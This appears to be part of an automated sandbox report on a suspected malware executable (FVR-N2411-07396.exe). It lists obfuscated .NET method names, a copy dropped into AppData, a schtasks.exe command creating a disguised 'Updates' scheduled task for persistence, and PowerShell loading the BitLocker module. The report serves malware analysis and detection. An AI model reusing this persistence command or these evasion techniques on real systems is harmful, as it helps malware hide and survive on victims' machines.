Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, bJK5w298pUyP0g8lHM.cs	High entropy of concatenated method names: 'ssuLVRWIfh', 'yfULXJCscI', 'gNxnF7j3Xl', 'MiCnCe5j42', 'LonLYuBSmB', 'Q0NL34iD43', 'UGiLeZFNlc', 'sUUL1qI1vi', 'rvwL5G54fb', 'pMvLEjgKDX'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, ITxStP87Ysreue9pxA.cs	High entropy of concatenated method names: 'aACCupDEs3', 'GTUCZ4OZfK', 'rPOC6DhkqC', 'CJRCb0jYuY', 'SKHCBfe6uc', 'qRtCdG0HaK', 'c4XT6IfENjMQ6ukpRA', 'Hfw6CVwc7KAuFuFwZb', 'qMYCC2lUw2', 'CxkCoboxni'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, apDEs3fGTU4OZfKjCi.cs	High entropy of concatenated method names: 'EQiH11E60H', 'qJaH5iMy7A', 'd0wHEpcwVh', 'UYHH4apGl4', 'eqVHQxmB6A', 'gs8H9FN2jl', 'Wj5HD7Uomf', 'RrZHVKsGl3', 'l65HRoR9QF', 'vheHXHHrHD'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, FLeEUIeZnbExMFAReZ.cs	High entropy of concatenated method names: 'FT4lfpFPTt', 'MpVlTX0U98', 'XpDlGOA4gv', 'XJ4lwhSrIE', 'mMIl2xhQex', 'MeRlJVW4vu', 'HsKljQ6OFE', 'wMAlcZ8gC6', 'S7bla3qhBR', 'MwjlYm5Nc6'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, xiDyMSzBX4NyV3rjYM.cs	High entropy of concatenated method names: 'un0Km4gmmJ', 'fBIKfn7djX', 'rrCKThCruP', 'JX9KGnDhEl', 'm5GKw56NI7', 'QyoK2KLYsf', 'UlwKJtogKo', 'v9uKt3UC9m', 'uoSKOvNuAo', 'wvtKvT7LCK'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, mucLRtGG0HaKkrRQgu.cs	High entropy of concatenated method names: 'lMNIgNwVH5', 'wwcIHiSjhi', 'g1gIxpZPU5', 'f09Iu7b1tf', 'vU0IZSS023', 'H6xxQbfqtQ', 'yrpx9KpnBU', 'zIfxDA13ZT', 'iBPxVigHX5', 'O38xRh6Rv0'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, fZoudy0p4k5NuTxMFa.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'T38WRyKA3X', 'Id2WXRuY76', 'WmTWzAihLn', 'OxYoF0myjY', 'xgEoC6j6si', 'fMhoWfG7Gu', 'S03oo9D1hN', 'HppypyqXguitEsX1EEC'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, zF9nXeRHnOkkXrg5Nm.cs	High entropy of concatenated method names: 'S5H7GlNfL9', 'Hi87wjG14M', 'MwM7NvgRYj', 'Tsd72m23n6', 'Mdd7JhMKMP', 'AJR7UfOiVn', 'xci7jLJ6Gq', 'fk47c7Tbd2', 'RnP7r8m7vk', 'AFy7a0H6vu'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, SNqeZA1SD2vlv8fMBa.cs	High entropy of concatenated method names: 'MrMBaGUGuC', 'WNGB3EJXw3', 'afqB1pbsBg', 'AbZB5udXyD', 'HDoBwo2bja', 'gV7BN0yqy8', 'gTZB2nnnFA', 'kBLBJvaqHj', 'ugZBUuxnc8', 'Xs4BjwiDyU'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, LYuYgyidosNTOEKHfe.cs	High entropy of concatenated method names: 'XKfxSpdPAA', 'lj9xPHxpgB', 'dqC0NNoZhS', 'r0C020NtFV', 'sIm0JkoAxh', 'Tvj0UUp2xS', 'X8m0jxxHh1', 'zFk0cUrVIq', 'pCE0rZW4ek', 'iMd0agXrAH'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, KyFtrLW9OxiCByct8O.cs	High entropy of concatenated method names: 'FeWpYBlEv', 'yXRhD2Hgb', 'wupm6Vg8S', 'wH0PtKdrm', 'y9MTs2IgB', 'CeGibS8OO', 'a7Lt9TGVWb3kaHoWfA', 'WAWqanxCDpyPGsRlCV', 'irZnLrRH4', 'DaYKYurex'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, qQ1kUHCFvTre2fluZHZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bpRKYhDnvP', 'JXpK33sS71', 'XTOKeMukX7', 'SvdK1i4cRY', 'aBdK5ZwZy8', 'a6dKEWGHw5', 'RJHK4XV03a'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.cs	High entropy of concatenated method names: 'DpEoghXPVh', 'wyRoAfA078', 'lk3oHq0r5f', 'yNZo0qLoNG', 'WqGoxOv6C0', 'kZqoIH8f6q', 'JP6ouIknPJ', 'r1DoZDH6M4', 'UNToMcp8v5', 'An8o6CgMob'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, kR5Zu6rQZ9pk5Z1T9Y.cs	High entropy of concatenated method names: 'jWGuOxCXC4', 'MhRuvKSXgT', 'DuRupfZ1Ay', 'tA3uhkJfkR', 'EfouS7XS2b', 'UppumaWtFP', 'bbluPFD7kS', 'sgOufq0cT5', 'IUuuTVXudN', 'pyOuimrhI1'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, yoviBaDFVvgmcnwmMa.cs	High entropy of concatenated method names: 'K0n7BoxZV2', 'Wx17LC0bwZ', 'JeK77k2ooD', 'WuJ7kqYBS7', 'wCb7yjedtA', 'ciw7tmU9vI', 'Dispose', 'Dh1nAmq8La', 'f8anHJsUxC', 'Ascn0Y9aWn'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, Tsw2ZcHAjSja6s8HSf.cs	High entropy of concatenated method names: 'Dispose', 'ygmCRcnwmM', 'sr6WwsXyh3', 'dGqWB1boNy', 'NAPCXQI9J4', 'Y2aCzreK42', 'ProcessDialogKey', 'ktpWFF9nXe', 'fnOWCkkXrg', 'SNmWWWWFvx'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, vMlPAnTPODhkqCPJR0.cs	High entropy of concatenated method names: 'MLq0hoy2Ue', 'hl50mwyNHh', 'gPr0fGL45I', 'GGg0TEiHh2', 'IPJ0B6luEl', 'DnR0dtGwtJ', 'VOh0LYHA0T', 'BMg0nXwPdR', 'C1l07tAiUr', 'SUp0KuHjox'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, BtG9i9CCpdyu6WtoZHM.cs	High entropy of concatenated method names: 'H9FKXil0UO', 'Dn5KzNJYie', 'Fp8kFQCXUa', 'VAFkCw5QQX', 'WeukWTLjTC', 'l1ikoaBy3l', 't0Qk859SCT', 'Aepkgwrj9T', 'M7YkANQEa4', 'qI2kHhGIpU'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, bJK5w298pUyP0g8lHM.cs	High entropy of concatenated method names: 'ssuLVRWIfh', 'yfULXJCscI', 'gNxnF7j3Xl', 'MiCnCe5j42', 'LonLYuBSmB', 'Q0NL34iD43', 'UGiLeZFNlc', 'sUUL1qI1vi', 'rvwL5G54fb', 'pMvLEjgKDX'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, ITxStP87Ysreue9pxA.cs	High entropy of concatenated method names: 'aACCupDEs3', 'GTUCZ4OZfK', 'rPOC6DhkqC', 'CJRCb0jYuY', 'SKHCBfe6uc', 'qRtCdG0HaK', 'c4XT6IfENjMQ6ukpRA', 'Hfw6CVwc7KAuFuFwZb', 'qMYCC2lUw2', 'CxkCoboxni'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, apDEs3fGTU4OZfKjCi.cs	High entropy of concatenated method names: 'EQiH11E60H', 'qJaH5iMy7A', 'd0wHEpcwVh', 'UYHH4apGl4', 'eqVHQxmB6A', 'gs8H9FN2jl', 'Wj5HD7Uomf', 'RrZHVKsGl3', 'l65HRoR9QF', 'vheHXHHrHD'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, FLeEUIeZnbExMFAReZ.cs	High entropy of concatenated method names: 'FT4lfpFPTt', 'MpVlTX0U98', 'XpDlGOA4gv', 'XJ4lwhSrIE', 'mMIl2xhQex', 'MeRlJVW4vu', 'HsKljQ6OFE', 'wMAlcZ8gC6', 'S7bla3qhBR', 'MwjlYm5Nc6'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, xiDyMSzBX4NyV3rjYM.cs	High entropy of concatenated method names: 'un0Km4gmmJ', 'fBIKfn7djX', 'rrCKThCruP', 'JX9KGnDhEl', 'm5GKw56NI7', 'QyoK2KLYsf', 'UlwKJtogKo', 'v9uKt3UC9m', 'uoSKOvNuAo', 'wvtKvT7LCK'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, mucLRtGG0HaKkrRQgu.cs	High entropy of concatenated method names: 'lMNIgNwVH5', 'wwcIHiSjhi', 'g1gIxpZPU5', 'f09Iu7b1tf', 'vU0IZSS023', 'H6xxQbfqtQ', 'yrpx9KpnBU', 'zIfxDA13ZT', 'iBPxVigHX5', 'O38xRh6Rv0'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, fZoudy0p4k5NuTxMFa.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'T38WRyKA3X', 'Id2WXRuY76', 'WmTWzAihLn', 'OxYoF0myjY', 'xgEoC6j6si', 'fMhoWfG7Gu', 'S03oo9D1hN', 'HppypyqXguitEsX1EEC'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, zF9nXeRHnOkkXrg5Nm.cs	High entropy of concatenated method names: 'S5H7GlNfL9', 'Hi87wjG14M', 'MwM7NvgRYj', 'Tsd72m23n6', 'Mdd7JhMKMP', 'AJR7UfOiVn', 'xci7jLJ6Gq', 'fk47c7Tbd2', 'RnP7r8m7vk', 'AFy7a0H6vu'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, SNqeZA1SD2vlv8fMBa.cs	High entropy of concatenated method names: 'MrMBaGUGuC', 'WNGB3EJXw3', 'afqB1pbsBg', 'AbZB5udXyD', 'HDoBwo2bja', 'gV7BN0yqy8', 'gTZB2nnnFA', 'kBLBJvaqHj', 'ugZBUuxnc8', 'Xs4BjwiDyU'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, LYuYgyidosNTOEKHfe.cs	High entropy of concatenated method names: 'XKfxSpdPAA', 'lj9xPHxpgB', 'dqC0NNoZhS', 'r0C020NtFV', 'sIm0JkoAxh', 'Tvj0UUp2xS', 'X8m0jxxHh1', 'zFk0cUrVIq', 'pCE0rZW4ek', 'iMd0agXrAH'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, KyFtrLW9OxiCByct8O.cs	High entropy of concatenated method names: 'FeWpYBlEv', 'yXRhD2Hgb', 'wupm6Vg8S', 'wH0PtKdrm', 'y9MTs2IgB', 'CeGibS8OO', 'a7Lt9TGVWb3kaHoWfA', 'WAWqanxCDpyPGsRlCV', 'irZnLrRH4', 'DaYKYurex'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, qQ1kUHCFvTre2fluZHZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bpRKYhDnvP', 'JXpK33sS71', 'XTOKeMukX7', 'SvdK1i4cRY', 'aBdK5ZwZy8', 'a6dKEWGHw5', 'RJHK4XV03a'
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.cs	High entropy of concatenated method names: 'DpEoghXPVh', 'wyRoAfA078', 'lk3oHq0r5f', 'yNZo0qLoNG', 'WqGoxOv6C0', 'kZqoIH8f6q', 'JP6ouIknPJ', 'r1DoZDH6M4', 'UNToMcp8v5', 'An8o6CgMob'
Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, FZaOUuOPvnEAfIAr0M.cs	High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, GtaAIbrHXObmMm8GPA.cs	High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, kAOj1Y7pfP90kycNNw.cs	High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, FZaOUuOPvnEAfIAr0M.cs	High entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, GtaAIbrHXObmMm8GPA.cs	High entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, kAOj1Y7pfP90kycNNw.cs	High entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
